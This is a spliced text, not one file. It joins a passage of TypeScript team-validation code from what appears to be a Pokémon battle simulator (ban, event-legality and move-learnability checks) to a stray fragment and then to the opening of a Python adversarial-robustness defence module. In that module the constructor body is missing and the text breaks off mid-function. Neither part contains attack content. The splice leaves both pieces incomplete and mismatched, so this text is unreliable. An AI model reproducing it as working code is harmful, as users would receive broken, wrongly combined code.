setHas['pokemon:' + species.id] = true;
setHas['basepokemon:' + toID(species.baseSpecies)] = true;
let isMega = false;
if (tierSpecies !== species) {
setHas['pokemon:' + tierSpecies.id] = true;
if (tierSpecies.isMega || tierSpecies.isPrimal) {
setHas['pokemontag:mega'] = true;
isMega = true;
}
}
const tier = tierSpecies.tier === '(PU)' ? 'ZU' : tierSpecies.tier === '(NU)' ? 'PU' : tierSpecies.tier;
const tierTag = 'pokemontag:' + toID(tier);
setHas[tierTag] = true;
const doublesTier = tierSpecies.doublesTier === '(DUU)' ? 'DNU' : tierSpecies.doublesTier;
const doublesTierTag = 'pokemontag:' + toID(doublesTier);
setHas[doublesTierTag] = true;
// Only pokemon that can gigantamax should have the Gmax flag
if (!tierSpecies.canGigantamax && set.gigantamax) {
return `${tierSpecies.name} cannot Gigantamax but is flagged as being able to.`;
}
let banReason = ruleTable.check('pokemon:' + species.id);
if (banReason) {
return `${species.name} is ${banReason}.`;
}
if (banReason === '') return null;
if (tierSpecies !== species) {
banReason = ruleTable.check('pokemon:' + tierSpecies.id);
if (banReason) {
return `${tierSpecies.name} is ${banReason}.`;
}
if (banReason === '') return null;
}
if (isMega) {
banReason = ruleTable.check('pokemontag:mega', setHas);
if (banReason) {
return `Mega evolutions are ${banReason}.`;
}
}
banReason = ruleTable.check('basepokemon:' + toID(species.baseSpecies));
if (banReason) {
return `${species.name} is ${banReason}.`;
}
if (banReason === '') {
// don't allow nonstandard speciess when whitelisting standard base species
// i.e. unbanning Pichu doesn't mean allowing Pichu-Spiky-Eared outside of Gen 4
const baseSpecies = dex.getSpecies(species.baseSpecies);
if (baseSpecies.isNonstandard === species.isNonstandard) {
return null;
}
}
banReason = ruleTable.check(tierTag) || (tier === 'AG' ? ruleTable.check('pokemontag:uber') : null);
if (banReason) {
return `${tierSpecies.name} is in ${tier}, which is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check(doublesTierTag);
if (banReason) {
return `${tierSpecies.name} is in ${doublesTier}, which is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('pokemontag:allpokemon');
if (banReason) {
return `${species.name} is not in the list of allowed pokemon.`;
}
// obtainability
if (tierSpecies.isNonstandard) {
banReason = ruleTable.check('pokemontag:' + toID(tierSpecies.isNonstandard));
if (banReason) {
if (tierSpecies.isNonstandard === 'Unobtainable') {
return `${tierSpecies.name} is not obtainable without hacking or glitches.`;
}
if (tierSpecies.isNonstandard === 'Gigantamax') {
return `${tierSpecies.name} is not obtainable without Gigantamaxing, even through hacking.`;
}
return `${tierSpecies.name} is tagged ${tierSpecies.isNonstandard}, which is ${banReason}.`;
}
if (banReason === '') return null;
}
// Special casing for Pokemon that can Gmax, but their Gmax factor cannot be legally obtained
if (tierSpecies.gmaxUnreleased && set.gigantamax) {
banReason = ruleTable.check('pokemontag:unobtainable');
if (banReason) {
return `${tierSpecies.name} is flagged as gigantamax, but it cannot gigantamax without hacking or glitches.`;
}
if (banReason === '') return null;
}
if (tierSpecies.isNonstandard && tierSpecies.isNonstandard !== 'Unobtainable') {
banReason = ruleTable.check('nonexistent', setHas);
if (banReason) {
if (['Past', 'Future'].includes(tierSpecies.isNonstandard)) {
return `${tierSpecies.name} does not exist in Gen ${dex.gen}.`;
}
return `${tierSpecies.name} does not exist in this game.`;
}
if (banReason === '') return null;
}
return null;
}
checkItem(set: PokemonSet, item: Item, setHas: {[k: string]: true}) {
const dex = this.dex;
const ruleTable = this.ruleTable;
setHas['item:' + item.id] = true;
let banReason = ruleTable.check('item:' + item.id);
if (banReason) {
return `${set.name}'s item ${item.name} is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('pokemontag:allitems');
if (banReason) {
return `${set.name}'s item ${item.name} is not in the list of allowed items.`;
}
// obtainability
if (item.isNonstandard) {
banReason = ruleTable.check('pokemontag:' + toID(item.isNonstandard));
if (banReason) {
if (item.isNonstandard === 'Unobtainable') {
return `${item.name} is not obtainable without hacking or glitches.`;
}
return `${set.name}'s item ${item.name} is tagged ${item.isNonstandard}, which is ${banReason}.`;
}
if (banReason === '') return null;
}
if (item.isNonstandard && item.isNonstandard !== 'Unobtainable') {
banReason = ruleTable.check('nonexistent', setHas);
if (banReason) {
if (['Past', 'Future'].includes(item.isNonstandard)) {
return `${set.name}'s item ${item.name} does not exist in Gen ${dex.gen}.`;
}
return `${set.name}'s item ${item.name} does not exist in this game.`;
}
if (banReason === '') return null;
}
return null;
}
checkMove(set: PokemonSet, move: Move, setHas: {[k: string]: true}) {
const dex = this.dex;
const ruleTable = this.ruleTable;
setHas['move:' + move.id] = true;
let banReason = ruleTable.check('move:' + move.id);
if (banReason) {
return `${set.name}'s move ${move.name} is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('pokemontag:allmoves');
if (banReason) {
return `${set.name}'s move ${move.name} is not in the list of allowed moves.`;
}
// obtainability
if (move.isNonstandard) {
banReason = ruleTable.check('pokemontag:' + toID(move.isNonstandard));
if (banReason) {
if (move.isNonstandard === 'Unobtainable') {
return `${move.name} is not obtainable without hacking or glitches.`;
}
if (move.isNonstandard === 'Gigantamax') {
return `${move.name} is not usable without Gigantamaxing its user, ${move.isMax}.`;
}
return `${set.name}'s move ${move.name} is tagged ${move.isNonstandard}, which is ${banReason}.`;
}
if (banReason === '') return null;
}
if (move.isNonstandard && move.isNonstandard !== 'Unobtainable') {
banReason = ruleTable.check('nonexistent', setHas);
if (banReason) {
if (['Past', 'Future'].includes(move.isNonstandard)) {
return `${set.name}'s move ${move.name} does not exist in Gen ${dex.gen}.`;
}
return `${set.name}'s move ${move.name} does not exist in this game.`;
}
if (banReason === '') return null;
}
return null;
}
checkAbility(set: PokemonSet, ability: Ability, setHas: {[k: string]: true}) {
const dex = this.dex;
const ruleTable = this.ruleTable;
setHas['ability:' + ability.id] = true;
let banReason = ruleTable.check('ability:' + ability.id);
if (banReason) {
return `${set.name}'s ability ${ability.name} is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('pokemontag:allabilities');
if (banReason) {
return `${set.name}'s ability ${ability.name} is not in the list of allowed abilities.`;
}
// obtainability
if (ability.isNonstandard) {
banReason = ruleTable.check('pokemontag:' + toID(ability.isNonstandard));
if (banReason) {
return `${set.name}'s ability ${ability.name} is tagged ${ability.isNonstandard}, which is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('nonexistent', setHas);
if (banReason) {
if (['Past', 'Future'].includes(ability.isNonstandard)) {
return `${set.name}'s ability ${ability.name} does not exist in Gen ${dex.gen}.`;
}
return `${set.name}'s ability ${ability.name} does not exist in this game.`;
}
if (banReason === '') return null;
}
return null;
}
checkNature(set: PokemonSet, nature: Nature, setHas: {[k: string]: true}) {
const dex = this.dex;
const ruleTable = this.ruleTable;
setHas['nature:' + nature.id] = true;
let banReason = ruleTable.check('nature:' + nature.id);
if (banReason) {
return `${set.name}'s nature ${nature.name} is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('allnatures');
if (banReason) {
return `${set.name}'s nature ${nature.name} is not in the list of allowed natures.`;
}
// obtainability
if (nature.isNonstandard) {
banReason = ruleTable.check('pokemontag:' + toID(nature.isNonstandard));
if (banReason) {
return `${set.name}'s nature ${nature.name} is tagged ${nature.isNonstandard}, which is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('nonexistent', setHas);
if (banReason) {
if (['Past', 'Future'].includes(nature.isNonstandard)) {
return `${set.name}'s nature ${nature.name} does not exist in Gen ${dex.gen}.`;
}
return `${set.name}'s nature ${nature.name} does not exist in this game.`;
}
if (banReason === '') return null;
}
return null;
}
validateEvent(set: PokemonSet, eventData: EventInfo, eventSpecies: Species): true | undefined;
validateEvent(
set: PokemonSet, eventData: EventInfo, eventSpecies: Species, because: string, from?: string
): string[] | undefined;
/**
* Returns array of error messages if invalid, undefined if valid
*
* If `because` is not passed, instead returns true if invalid.
*/
validateEvent(set: PokemonSet, eventData: EventInfo, eventSpecies: Species, because = ``, from = `from an event`) {
const dex = this.dex;
let name = set.species;
const species = dex.getSpecies(set.species);
const maxSourceGen = this.ruleTable.has('allowtradeback') ? Utils.clampIntRange(dex.gen + 1, 1, 8) : dex.gen;
if (!eventSpecies) eventSpecies = species;
if (set.name && set.species !== set.name && species.baseSpecies !== set.name) name = `${set.name} (${set.species})`;
const fastReturn = !because;
if (eventData.from) from = `from ${eventData.from}`;
const etc = `${because} ${from}`;
const problems = [];
if (dex.gen < 8 && this.minSourceGen > eventData.generation) {
if (fastReturn) return true;
problems.push(`This format requires Pokemon from gen ${this.minSourceGen} or later and ${name} is from gen ${eventData.generation}${etc}.`);
}
if (maxSourceGen < eventData.generation) {
if (fastReturn) return true;
problems.push(`This format is in gen ${dex.gen} and ${name} is from gen ${eventData.generation}${etc}.`);
}
if (eventData.japan) {
if (fastReturn) return true;
problems.push(`${name} has moves from Japan-only events, but this format simulates International Yellow/Crystal which can't trade with Japanese games.`);
}
if (eventData.level && (set.level || 0) < eventData.level) {
if (fastReturn) return true;
problems.push(`${name} must be at least level ${eventData.level}${etc}.`);
}
if ((eventData.shiny === true && !set.shiny) || (!eventData.shiny && set.shiny)) {
if (fastReturn) return true;
const shinyReq = eventData.shiny ? ` be shiny` : ` not be shiny`;
problems.push(`${name} must${shinyReq}${etc}.`);
}
if (eventData.gender) {
if (set.gender && eventData.gender !== set.gender) {
if (fastReturn) return true;
problems.push(`${name}'s gender must be ${eventData.gender}${etc}.`);
}
}
const canMint = dex.gen > 7;
if (eventData.nature && eventData.nature !== set.nature && !canMint) {
if (fastReturn) return true;
problems.push(`${name} must have a ${eventData.nature} nature${etc} - Mints are only available starting gen 8.`);
}
let requiredIVs = 0;
if (eventData.ivs) {
/** In Gen 7, IVs can be changed to 31 */
const canBottleCap = (dex.gen >= 7 && set.level === 100);
if (!set.ivs) set.ivs = {hp: 31, atk: 31, def: 31, spa: 31, spd: 31, spe: 31};
const statTable = {
hp: 'HP', atk: 'Attack', def: 'Defense', spa: 'Special Attack', spd: 'Special Defense', spe: 'Speed',
};
let statName: StatName;
for (statName in eventData.ivs) {
if (canBottleCap && set.ivs[statName] === 31) continue;
if (set.ivs[statName] !== eventData.ivs[statName]) {
if (fastReturn) return true;
problems.push(`${name} must have ${eventData.ivs[statName]} ${statTable[statName]} IVs${etc}.`);
}
}
if (canBottleCap) {
// IVs can be overridden but Hidden Power type can't
if (Object.keys(eventData.ivs).length >= 6) {
const requiredHpType = dex.getHiddenPower(eventData.ivs).type;
if (set.hpType && set.hpType !== requiredHpType) {
if (fastReturn) return true;
problems.push(`${name} can only have Hidden Power ${requiredHpType}${etc}.`);
}
set.hpType = requiredHpType;
}
}
} else {
requiredIVs = eventData.perfectIVs || 0;
}
if (requiredIVs && set.ivs) {
// Legendary Pokemon must have at least 3 perfect IVs in gen 6
// Events can also have a certain amount of guaranteed perfect IVs
let perfectIVs = 0;
let statName: StatName;
for (statName in set.ivs) {
if (set.ivs[statName] >= 31) perfectIVs++;
}
if (perfectIVs < requiredIVs) {
if (fastReturn) return true;
if (eventData.perfectIVs) {
problems.push(`${name} must have at least ${requiredIVs} perfect IVs${etc}.`);
}
}
// The perfect IV count affects Hidden Power availability
if (dex.gen >= 3 && requiredIVs >= 3 && set.hpType === 'Fighting') {
if (fastReturn) return true;
problems.push(`${name} can't use Hidden Power Fighting because it must have at least three perfect IVs${etc}.`);
} else if (dex.gen >= 3 && requiredIVs >= 5 && set.hpType &&
!['Dark', 'Dragon', 'Electric', 'Steel', 'Ice'].includes(set.hpType)) {
if (fastReturn) return true;
problems.push(`${name} can only use Hidden Power Dark/Dragon/Electric/Steel/Ice because it must have at least 5 perfect IVs${etc}.`);
}
}
// Event-related ability restrictions only matter if we care about illegal abilities
const ruleTable = this.ruleTable;
if (ruleTable.has('obtainableabilities')) {
if (dex.gen <= 5 && eventData.abilities && eventData.abilities.length === 1 && !eventData.isHidden) {
if (species.name === eventSpecies.name) {
// has not evolved, abilities must match
const requiredAbility = dex.getAbility(eventData.abilities[0]).name;
if (set.ability !== requiredAbility) {
if (fastReturn) return true;
problems.push(`${name} must have ${requiredAbility}${etc}.`);
}
} else {
// has evolved
const ability1 = dex.getAbility(eventSpecies.abilities['1']);
if (ability1.gen && eventData.generation >= ability1.gen) {
// pokemon had 2 available abilities in the gen the event happened
// ability is restricted to a single ability slot
const requiredAbilitySlot = (toID(eventData.abilities[0]) === ability1.id ? 1 : 0);
const requiredAbility = dex.getAbility(species.abilities[requiredAbilitySlot] || species.abilities['0']).name;
if (set.ability !== requiredAbility) {
const originalAbility = dex.getAbility(eventData.abilities[0]).name;
if (fastReturn) return true;
problems.push(`${name} must have ${requiredAbility}${because} from a ${originalAbility} ${eventSpecies.name} event.`);
}
}
}
}
if (species.abilities['H']) {
const isHidden = (set.ability === species.abilities['H']);
if (!isHidden && eventData.isHidden) {
if (fastReturn) return true;
problems.push(`${name} must have its Hidden Ability${etc}.`);
}
const canUseAbilityPatch = dex.gen >= 8 && this.format.mod !== 'gen8dlc1';
if (isHidden && !eventData.isHidden && !canUseAbilityPatch) {
if (fastReturn) return true;
problems.push(`${name} must not have its Hidden Ability${etc}.`);
}
}
}
if (problems.length) return problems;
if (eventData.gender) set.gender = eventData.gender;
}
allSources(species?: Species) {
let minSourceGen = this.minSourceGen;
if (this.dex.gen >= 3 && minSourceGen < 3) minSourceGen = 3;
if (species) minSourceGen = Math.max(minSourceGen, species.gen);
const maxSourceGen = this.ruleTable.has('allowtradeback') ? Utils.clampIntRange(this.dex.gen + 1, 1, 8) : this.dex.gen;
return new PokemonSources(maxSourceGen, minSourceGen);
}
validateMoves(
species: Species, moves: string[], setSources: PokemonSources, set?: Partial<PokemonSet>,
name: string = species.name
) {
const dex = this.dex;
const ruleTable = this.ruleTable;
const problems = [];
const checkCanLearn = (ruleTable.checkCanLearn && ruleTable.checkCanLearn[0] || this.checkCanLearn);
for (const moveName of moves) {
const move = dex.getMove(moveName);
const problem = checkCanLearn.call(this, move, species, setSources, set);
if (problem) {
problems.push(`${name}${problem}`);
break;
}
}
if (setSources.size() && setSources.moveEvoCarryCount > 3) {
if (setSources.sourcesBefore < 6) setSources.sourcesBefore = 0;
setSources.sources = setSources.sources.filter(
source => source.charAt(1) === 'E' && parseInt(source.charAt(0)) >= 6
);
if (!setSources.size()) {
problems.push(`${name} needs to know ${species.evoMove || 'a Fairy-type move'} to evolve, so it can only know 3 other moves from ${species.prevo}.`);
}
}
if (problems.length) return problems;
if (setSources.isHidden) {
setSources.sources = setSources.sources.filter(
source => parseInt(source.charAt(0)) >= 5
);
if (setSources.sourcesBefore < 5) setSources.sourcesBefore = 0;
const canUseAbilityPatch = dex.gen >= 8 && this.format.mod !== 'gen8dlc1';
if (!setSources.size() && !canUseAbilityPatch) {
problems.push(`${name} has a hidden ability - it can't have moves only learned before gen 5.`);
return problems;
}
}
if (setSources.babyOnly && setSources.sources.length) {
const baby = dex.getSpecies(setSources.babyOnly);
const babyEvo = toID(baby.evos[0]);
setSources.sources = setSources.sources.filter(source => {
if (source.charAt(1) === 'S') {
const sourceId = source.split(' ')[1];
if (sourceId !== baby.id) return false;
}
if (source.charAt(1) === 'E') {
if (babyEvo && source.slice(2) === babyEvo) return false;
}
if (source.charAt(1) === 'D') {
if (babyEvo && source.slice(2) === babyEvo) return false;
}
return true;
});
if (!setSources.size()) {
problems.push(`${name}'s event/egg moves are from an evolution, and are incompatible with its moves from ${baby.name}.`);
}
}
if (setSources.babyOnly && setSources.size() && this.gen > 2) {
// there do theoretically exist evo/tradeback incompatibilities in
// gen 2, but those are very complicated to validate and should be
// handled separately anyway, so for now we just treat them all as
// legal (competitively relevant ones can be manually banned)
const baby = dex.getSpecies(setSources.babyOnly);
setSources.sources = setSources.sources.filter(source => {
if (baby.gen > parseInt(source.charAt(0)) && !source.startsWith('1ST')) return false;
if (baby.gen > 2 && source === '7V') return false;
return true;
});
if (setSources.sourcesBefore < baby.gen) setSources.sourcesBefore = 0;
if (!setSources.size()) {
problems.push(`${name} has moves from before Gen ${baby.gen}, which are incompatible with its moves from ${baby.name}.`);
}
}
return problems;
}
/** Returns null if you can learn the move, or a string explaining why you can't learn it */
checkCanLearn(
move: Move,
s: Species,
setSources = this.allSources(s),
set: Partial<PokemonSet> = {}
): string | null {
const dex = this.dex;
if (!setSources.size()) throw new Error(`Bad sources passed to checkCanLearn`);
move = dex.getMove(move);
const moveid = move.id;
const baseSpecies = dex.getSpecies(s);
let species: Species | null = baseSpecies;
const format = this.format;
const ruleTable = dex.getRuleTable(format);
const alreadyChecked: {[k: string]: boolean} = {};
const level = set.level || 100;
let cantLearnReason = null;
let limit1 = true;
let sketch = false;
let blockedHM = false;
let babyOnly = '';
// This is a pretty complicated algorithm
// Abstractly, what it does is construct the union of sets of all
// possible ways this pokemon could be obtained, and then intersect
// it with a the pokemon's existing set of all possible ways it could
// be obtained. If this intersection is non-empty, the move is legal.
// set of possible sources of a pokemon with this move
const moveSources = new PokemonSources();
/**
* The format doesn't allow Pokemon traded from the future
* (This is everything except in Gen 1 Tradeback)
*/
const noFutureGen = !ruleTable.has('allowtradeback');
let tradebackEligible = false;
while (species?.name && !alreadyChecked[species.id]) {
alreadyChecked[species.id] = true;
if (dex.gen <= 2 && species.gen === 1) tradebackEligible = true;
const lsetData = dex.getLearnsetData(species.id);
if (!lsetData.learnset) {
if ((species.changesFrom || species.baseSpecies) !== species.name) {
// forme without its own learnset
species = dex.getSpecies(species.changesFrom || species.baseSpecies);
// warning: formes with their own learnset, like Wormadam, should NOT
// inherit from their base forme unless they're freely switchable
continue;
}
if (species.isNonstandard) {
// It's normal for a nonstandard species not to have learnset data
// Formats should replace the `Obtainable Moves` rule if they want to
// allow pokemon without learnsets.
return ` can't learn any moves at all.`;
}
// should never happen
throw new Error(`Species with no learnset data: ${species.id}`);
}
const checkingPrevo = species.baseSpecies !== s.baseSpecies;
if (checkingPrevo && !moveSources.size()) {
if (!setSources.babyOnly || !species.prevo) {
babyOnly = species.id;
}
}
let lset = lsetData.learnset[moveid];
if (moveid === 'sketch') {
sketch = true;
} else if (lsetData.learnset['sketch']) {
if (move.noSketch || move.isZ || move.isMax) {
cantLearnReason = `can't be Sketched.`;
} else if (move.gen > 7 && !ruleTable.has('standardnatdex')) {
cantLearnReason = `can't be Sketched because it's a Gen 8 move and Sketch isn't available in Gen 8.`;
} else {
if (!lset) sketch = true;
lset = lsetData.learnset['sketch'].concat(lset || []);
}
}
if (typeof lset === 'string') lset = [lset];
if (lset) {
for (let learned of lset) {
// Every `learned` represents a single way a pokemon might
// learn a move. This can be handled one of several ways:
// `continue`
// means we can't learn it
// `return null`
// means we can learn it with no restrictions
// (there's a way to just teach any pokemon of this species
// the move in the current gen, like a TM.)
// `moveSources.add(source)`
// means we can learn it only if obtained that exact way described
// in source
// `moveSources.addGen(learnedGen)`
// means we can learn it only if obtained at or before learnedGen
// (i.e. get the pokemon however you want, transfer to that gen,
// teach it, and transfer it to the current gen.)
const learnedGen = parseInt(learned.charAt(0));
if (learnedGen < this.minSourceGen) {
if (!cantLearnReason) {
cantLearnReason = `can't be transferred from Gen ${learnedGen} to ${this.minSourceGen}.`;
}
continue;
}
if (noFutureGen && learnedGen > dex.gen) {
if (!cantLearnReason) {
cantLearnReason = `can't be transferred from Gen ${learnedGen} to ${dex.gen}.`;
}
continue;
}
// redundant
if (learnedGen <= moveSources.sourcesBefore) continue;
const canUseAbilityPatch = dex.gen >= 8 && format.mod !== 'gen8dlc1';
if (
learnedGen < 7 && setSources.isHidden && !canUseAbilityPatch &&
!dex.mod('gen' + learnedGen).getSpecies(baseSpecies.name).abilities['H']
) {
cantLearnReason = `can only be learned in gens without Hidden Abilities.`;
continue;
}
if (!species.isNonstandard) {
// HMs can't be transferred
if (dex.gen >= 4 && learnedGen <= 3 && [
'cut', 'fly', 'surf', 'strength', 'flash', 'rocksmash', 'waterfall', 'dive',
].includes(moveid)) {
cantLearnReason = `can't be transferred from Gen 3 to 4 because it's an HM move.`;
continue;
}
if (dex.gen >= 5 && learnedGen <= 4 && [
'cut', 'fly', 'surf', 'strength', 'rocksmash', 'waterfall', 'rockclimb',
].includes(moveid)) {
cantLearnReason = `can't be transferred from Gen 3 to 4 because it's an HM move.`;
continue;
}
// Defog and Whirlpool can't be transferred together
if (dex.gen >= 5 && ['defog', 'whirlpool'].includes(moveid) && learnedGen <= 4) blockedHM = true;
}
if (learned.charAt(1) === 'L') {
// special checking for level-up moves
if (level >= parseInt(learned.substr(2)) || learnedGen === 7) {
// we're past the required level to learn it
// (gen 7 level-up moves can be relearnered at any level)
// falls through to LMT check below
} else if (level >= 5 && learnedGen === 3 && species.canHatch) {
// Pomeg Glitch
} else if ((!species.gender || species.gender === 'F') && learnedGen >= 2 && species.canHatch) {
// available as egg move
learned = learnedGen + 'Eany';
// falls through to E check below
} else {
// this move is unavailable, skip it
cantLearnReason = `is learned at level ${parseInt(learned.substr(2))}.`;
continue;
}
}
// Gen 8 egg moves can be taught to any pokemon from any source
if (learned === '8E' || 'LMTR'.includes(learned.charAt(1))) {
if (learnedGen === dex.gen && learned.charAt(1) !== 'R') {
// current-gen level-up, TM or tutor moves:
// always available
if (learned !== '8E' && babyOnly) setSources.babyOnly = babyOnly;
if (!moveSources.moveEvoCarryCount) return null;
}
// past-gen level-up, TM, or tutor moves:
// available as long as the source gen was or was before this gen
if (learned.charAt(1) === 'R') {
moveSources.restrictedMove = moveid;
}
limit1 = false;
moveSources.addGen(learnedGen);
} else if (learned.charAt(1) === 'E') {
// egg moves:
// only if hatched from an egg
let limitedEggMove: ID | null | undefined = undefined;
if (learned.slice(1) === 'Eany') {
limitedEggMove = null;
} else if (learnedGen < 6) {
limitedEggMove = move.id;
}
learned = learnedGen + 'E' + (species.prevo ? species.id : '');
if (tradebackEligible && learnedGen === 2 && move.gen <= 1) {
// can tradeback
moveSources.add('1ET' + learned.slice(2));
}
moveSources.add(learned, limitedEggMove);
} else if (learned.charAt(1) === 'S') {
// event moves:
// only if that was the source
// Event Pokémon:
// Available as long as the past gen can get the Pokémon and then trade it back.
if (tradebackEligible && learnedGen === 2 && move.gen <= 1) {
// can tradeback
moveSources.add('1ST' + learned.slice(2) + ' ' + species.id);
}
moveSources.add(learned + ' ' + species.id);
} else if (learned.charAt(1) === 'D') {
// DW moves:
// only if that was the source
moveSources.add(learned + species.id);
} else if (learned.charAt(1) === 'V' && this.minSourceGen < learnedGen) {
// Virtual Console or Let's Go transfer moves:
// only if that was the source
moveSources.add(learned);
}
}
}
if (ruleTable.has('mimicglitch') && species.gen < 5) {
// include the Mimic Glitch when checking this mon's learnset
const glitchMoves = ['metronome', 'copycat', 'transform', 'mimic', 'assist'];
let getGlitch = false;
for (const i of glitchMoves) {
if (lsetData.learnset[i]) {
if (!(i === 'mimic' && dex.getAbility(set.ability).gen === 4 && !species.prevo)) {
getGlitch = true;
break;
}
}
}
if (getGlitch) {
moveSources.addGen(4);
if (move.gen < 5) {
limit1 = false;
}
}
}
if (!moveSources.size()) {
if (
(species.evoType === 'levelMove' && species.evoMove !== move.name) ||
(species.id === 'sylveon' && move.type !== 'Fairy')
) {
moveSources.moveEvoCarryCount = 1;
}
}
// also check to see if the mon's prevo or freely switchable formes can learn this move
species = this.learnsetParent(species);
}
if (limit1 && sketch) {
// limit 1 sketch move
if (setSources.sketchMove) {
return ` can't Sketch ${move.name} and ${setSources.sketchMove} because it can only Sketch 1 move.`;
}
setSources.sketchMove = move.name;
}
if (blockedHM) {
// Limit one of Defog/Whirlpool to be transferred
if (setSources.hm) return ` can't simultaneously transfer Defog and Whirlpool from Gen 4 to 5.`;
setSources.hm = moveid;
}
if (!setSources.restrictiveMoves) {
setSources.restrictiveMoves = [];
}
setSources.restrictiveMoves.push(move.name);
// Now that we have our list of possible sources, intersect it with the current list
if (!moveSources.size()) {
if (cantLearnReason) return `'s move ${move.name} ${cantLearnReason}`;
return ` can't learn ${move.name}.`;
}
setSources.intersectWith(moveSources);
if (!setSources.size()) {
return `'s moves ${(setSources.restrictiveMoves || []).join(', ')} are incompatible.`;
}
if (babyOnly) setSources.babyOnly = babyOnly;
return null;
}
learnsetParent(species: Species) {
// Own Tempo Rockruff and Battle Bond Greninja are special event formes
// that are visually indistinguishable from their base forme but have
// different learnsets. To prevent a leak, we make them show up as their
// base forme, but hardcode their learnsets into Rockruff-Dusk and
// Greninja-Ash
if ((species.baseSpecies === 'Gastrodon' || species.baseSpecies === 'Pumpkaboo') && species.forme) {
return this.dex.getSpecies(species.baseSpecies);
} else if (species.name === 'Lycanroc-Dusk') {
return this.dex.getSpecies('Rockruff-Dusk');
} else if (species.name === 'Greninja-Ash') {
return null;
} else if (species.prevo) {
// there used to be a check for Hidden Ability here, but apparently it's unnecessary
// Shed Skin Pupitar can definitely evolve into Unnerve Tyranitar
species = this.dex.getSpecies(species.prevo);
if (species.gen > Math.max(2, this.dex.gen)) return null;
return species;
} else if (species.changesFrom && species.baseSpecies !== 'Kyurem') {
// For Pokemon like Rotom and Necrozma whose movesets are extensions are their base formes
return this.dex.getSpecies(species.changesFrom);
}
return null;
}
static fillStats(stats: SparseStatsTable | null, fillNum = 0): StatsTable {
const filledStats: StatsTable = {hp: fillNum, atk: fillNum, def: fillNum, spa: fillNum, spd: fillNum, spe: fillNum};
if (stats) {
let statName: StatName;
for (statName in filledStats) {
const stat = stats[statName];
if (typeof stat === 'number') filledStats[statName] = stat;
}
}
return filledStats;
}
static get(format: string | Format) {
return new TeamValidator(format);
}
}
| okemonSources |
variance_minimization.py | # MIT License
#
# Copyright (C) The Adversarial Robustness Toolbox (ART) Authors 2018
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module implements the total variance minimization defence `TotalVarMin`.
| Paper link: https://openreview.net/forum?id=SyJ7ClWCb
| Please keep in mind the limitations of defences. For more information on the limitations of this defence,
see https://arxiv.org/abs/1802.00420 . For details on how to evaluate classifier security in general, see
https://arxiv.org/abs/1902.06705
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
from typing import Optional, Tuple, TYPE_CHECKING
import numpy as np
from scipy.optimize import minimize
from tqdm import tqdm
from art.config import ART_NUMPY_DTYPE
from art.defences.preprocessor.preprocessor import Preprocessor
if TYPE_CHECKING:
from art.utils import CLIP_VALUES_TYPE
logger = logging.getLogger(__name__)
class TotalVarMin(Preprocessor):
"""
Implement the total variance minimization defence approach.
| Paper link: https://openreview.net/forum?id=SyJ7ClWCb
| Please keep in mind the limitations of defences. For more information on the limitations of this
defence, see https://arxiv.org/abs/1802.00420 . For details on how to evaluate classifier security in general,
see https://arxiv.org/abs/1902.06705
"""
params = ["prob", "norm", "lamb", "solver", "max_iter", "clip_values", "verbose"]
def __init__(
self,
prob: float = 0.3,
norm: int = 2,
lamb: float = 0.5,
solver: str = "L-BFGS-B",
max_iter: int = 10,
clip_values: Optional["CLIP_VALUES_TYPE"] = None,
apply_fit: bool = False,
apply_predict: bool = True,
verbose: bool = False,
):
|
def __call__(self, x: np.ndarray, y: Optional[np.ndarray] = None) -> Tuple[np.ndarray, Optional[np.ndarray]]:
"""
Apply total variance minimization to sample `x`.
:param x: Sample to compress with shape `(batch_size, width, height, depth)`.
:param y: Labels of the sample `x`. This function does not affect them in any way.
:return: Similar samples.
"""
if len(x.shape) == 2:
raise ValueError(
"Feature vectors detected. Variance minimization can only be applied to data with spatial dimensions."
)
x_preproc = x.copy()
# Minimize one input at a time
for i, x_i in enumerate(tqdm(x_preproc, desc="Variance minimization", disable=not self.verbose)):
mask = (np.random.rand(*x_i.shape) < self.prob).astype("int")
x_preproc[i] = self._minimize(x_i, mask)
if self.clip_values is not None:
np.clip(x_preproc, self.clip_values[0], self.clip_values[1], out=x_preproc)
return x_preproc.astype(ART_NUMPY_DTYPE), y
def _minimize(self, x: np.ndarray, mask: np.ndarray) -> np.ndarray:
"""
Minimize the total variance objective function.
:param x: Original image.
:param mask: A matrix that decides which points are kept.
:return: A new image.
"""
z_min = x.copy()
for i in range(x.shape[2]):
res = minimize(
self._loss_func,
z_min[:, :, i].flatten(),
(x[:, :, i], mask[:, :, i], self.norm, self.lamb),
method=self.solver,
jac=self._deri_loss_func,
options={"maxiter": self.max_iter},
)
z_min[:, :, i] = np.reshape(res.x, z_min[:, :, i].shape)
return z_min
@staticmethod
def _loss_func(z_init: np.ndarray, x: np.ndarray, mask: np.ndarray, norm: int, lamb: float) -> float:
"""
Loss function to be minimized.
:param z_init: Initial guess.
:param x: Original image.
:param mask: A matrix that decides which points are kept.
:param norm: The norm (positive integer).
:param lamb: The lambda parameter in the objective function.
:return: Loss value.
"""
res = np.sqrt(np.power(z_init - x.flatten(), 2).dot(mask.flatten()))
z_init = np.reshape(z_init, x.shape)
